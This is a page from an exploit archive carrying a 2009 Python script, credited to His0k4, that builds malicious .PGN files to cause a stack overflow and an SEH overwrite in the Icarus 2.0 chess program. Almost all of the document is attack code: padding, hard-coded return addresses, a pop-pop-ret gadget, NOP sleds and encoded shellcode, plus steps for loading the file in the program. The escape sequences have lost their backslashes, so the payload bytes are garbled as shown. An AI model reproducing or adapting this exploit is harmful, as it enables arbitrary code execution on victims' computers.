Icarus 2.0 (.PGN File) Local Stack Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Icarus 2.0 (.PGN File) Local Stack Overflow Exploit (SEH)
# Published : 2009-03-18
# Author : His0k4
# Previous Title : Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit
# Next Title : Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit (multi target)

#usage: exploit.py
print "********************************************************************"
print " Icarus 2.0 Local Stack Overflow Exploitn"
print " Download: http://www.randomsoftware.com/pub/icarus.exe"
print " Author : His0k4"
print " Tested on: Windows XP Pro SP2 Frn"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)n"
print " Tip of the day: Klimontayne fe romayne :D"
print "********************************************************************nn"

					
payload1 =   "x41" * 336
payload1 +=  "x5Dx38x82x7C" # call esp kernel32.dll (sp2)
payload1 +=  "x90" * 19 #some nops
payload1 +=  "x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38"
payload1 +=  "x4exf9x9fx83xebxfcxe2xf4xc4xa6xbdx9fx38x4ex72xda"
payload1 +=  "x04xc5x85x9ax40x4fx16x14x77x56x72xc0x18x4fx12xd6"
payload1 +=  "xb3x7ax72x9exd6x7fx39x06x94xcax39xebx3fx8fx33x92"
payload1 +=  "x39x8cx12x6bx03x1axddx9bx4dxabx72xc0x1cx4fx12xf9"
payload1 +=  "xb3x42xb2x14x67x52xf8x74xb3x52x72x9exd3xc7xa5xbb"
payload1 +=  "x3cx8dxc8x5fx5cxc5xb9xafxbdx8ex81x93xb3x0exf5x14"
payload1 +=  "x48x52x54x14x50x46x12x96xb3xcex49x9fx38x4ex72xf7"
payload1 +=  "x04x11xc8x69x58x18x70x67xbbx8ex82xcfx50xbex73x9b"
payload1 +=  "x67x26x61x61xb2x40xaex60xdfx2dx98xf3x5bx4exf9x9f"
junk     =   "xCC"*7000


payload2 =	 "x5Bx46x6Fx72x6Dx61x74x20x22x4Cx65x63x74x75x72x65x22x5D"
payload2 +=  "x0Ax5Bx54x69x74x6Cx65x20x22x65x78x70x6Cx6Fx69x74x22x5D"
payload2 +=  "x0Ax0A"
payload2 +=  "x41"*788
payload2 +=  "xEBx06x90x90" # jmp +6
payload2 +=  "xE9x10x37x01" # universal pop pop ret
payload2 +=  "x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38"
payload2 +=  "x4exf9x9fx83xebxfcxe2xf4xc4xa6xbdx9fx38x4ex72xda"
payload2 +=  "x04xc5x85x9ax40x4fx16x14x77x56x72xc0x18x4fx12xd6"
payload2 +=  "xb3x7ax72x9exd6x7fx39x06x94xcax39xebx3fx8fx33x92"
payload2 +=  "x39x8cx12x6bx03x1axddx9bx4dxabx72xc0x1cx4fx12xf9"
payload2 +=  "xb3x42xb2x14x67x52xf8x74xb3x52x72x9exd3xc7xa5xbb"
payload2 +=  "x3cx8dxc8x5fx5cxc5xb9xafxbdx8ex81x93xb3x0exf5x14"
payload2 +=  "x48x52x54x14x50x46x12x96xb3xcex49x9fx38x4ex72xf7"
payload2 +=  "x04x11xc8x69x58x18x70x67xbbx8ex82xcfx50xbex73x9b"
payload2 +=  "x67x26x61x61xb2x40xaex60xdfx2dx98xf3x5bx4exf9x9f"
payload2 +=  "xCC"*7000



try:
    out_file = open("exploit_eip.PGN",'w')
    out_file.write(payload1+junk)
    out_file.close()
    print "Eip exploit File Created!nNow you can run this file directlyn"
except:
    print "Error"
try:
    out_file = open("exploit_seh.PGN",'w')
    out_file.write(payload2)
    out_file.close()
    print "Seh exploit File Created!nOpen Icarus then game>load and chose exploit_seh.PGNn"
except:
    print "Error"	

# www.Syue.com [2009-03-18]